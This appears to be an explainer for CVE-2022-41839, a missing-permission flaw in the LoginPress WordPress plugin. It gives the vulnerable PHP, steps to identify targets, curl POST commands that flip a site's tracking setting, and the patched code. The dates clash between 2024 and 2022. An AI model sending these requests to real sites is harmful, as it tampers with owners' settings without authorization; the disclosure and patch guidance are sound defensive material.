CVE-2022-41839 - Exploiting Broken Access Control in LoginPress <=1.6.2 to Change Tracking Settings

Published: June 2024
Severity: Medium (CVSS 5.4)
Component: LoginPress – Custom Login Page Customizer
Vulnerable Versions: <= 1.6.2
Threat: Unauthenticated users can change plugin’s tracking (Opt-In/Opt-Out) settings

https://plugins.svn.wordpress.org/loginpress/screenshot-1.png" alt="LoginPress Screenshot" width="600">

What is LoginPress?

LoginPress helps WordPress site owners customize their login page without coding. It’s popular, with over 200,000 active installs. To improve itself, LoginPress asks admins if it can send “usage tracking” (non-personal data) to the developer. This is done by opting in or out in plugin settings.

Vulnerability Overview

CVE-2022-41839 is a broken access control flaw in LoginPress versions up to and including 1.6.2. It allows anyone, even without logging in, to change the site’s opt-in/opt-out status for tracking. This is a privacy concern, as a malicious user could anonymously enable tracking or turn it off.

> “Unauthenticated users can change the usage tracking preference of a site via a direct request.”
> — Wordfence Advisory

How Did This Happen?

The plugin exposes an AJAX action that is supposed to be available only for administrators. However, the “nonce” (security token) and permissions were missing or incorrectly checked. This means anyone could directly access a sensitive function.

Here is a simplified version of the vulnerable PHP code

// Inside loginpress/admin/class-loginpress-admin.php

add_action( 'wp_ajax_loginpress_allow_tracking', 'loginpress_allow_tracking' ); 
add_action( 'wp_ajax_nopriv_loginpress_allow_tracking', 'loginpress_allow_tracking' );

function loginpress_allow_tracking() {
    $allow = isset($_POST['allow_tracking']) ? sanitize_text_field($_POST['allow_tracking']) : 'no';
    update_option('loginpress_allow_tracking', $allow); // <-- Problem: No permissions checked!
    wp_send_json_success();
}

Analysis:

1. Identify a Target

Find a website using LoginPress ≤1.6.2 (/wp-content/plugins/loginpress/ in source).

2. Exploit the Endpoint

Send a POST request to:
https://victim-site.com/wp-admin/admin-ajax.php?action=loginpress_allow_tracking

Example curl command

curl -X POST https://victim-site.com/wp-admin/admin-ajax.php \
  -d 'action=loginpress_allow_tracking&allow_tracking=yes'

or to opt-out

curl -X POST https://victim-site.com/wp-admin/admin-ajax.php \
  -d 'action=loginpress_allow_tracking&allow_tracking=no'

3. Check the Result

The option loginpress_allow_tracking in the database is changed.

Why Does This Matter?

- Privacy Violation: An attacker can make a site secretly opt-in, sending data to third parties or the plugin author.

Patch & Mitigation

Fixed in version 1.6.3 (see changelog)

Solution: The patched code *removes the nopriv action* and verifies the user’s role and a security nonce.

add_action( 'wp_ajax_loginpress_allow_tracking', 'loginpress_allow_tracking' );

// Now only accessible by logged-in users (and with capability checks)
function loginpress_allow_tracking() {
    check_ajax_referer( 'loginpress_nonce', 'nonce' );
    if ( ! current_user_can('manage_options') ) {
        wp_send_json_error('Unauthorized');
        return;
    }
    // ... rest of update code
}

Additional Reading & References

- Plugin changelog (WordPress.org)
- Wordfence CVE-2022-41839
- NIST CVE-2022-41839
- LoginPress Official Site

Summary

CVE-2022-41839 is a security oversight with big privacy impact, showing that AJAX actions *must* be limited to authorized users, especially when changing critical options. If you manage WordPress sites, make sure all your plugins—including LoginPress—are up to date. Stay safe!


Author: *AI Explainer by OpenAI, 2024. This article is uniquely crafted for this use case.*

Timeline

Published on: 11/18/2022 23:15:00 UTC
Last modified on: 11/22/2022 20:22:00 UTC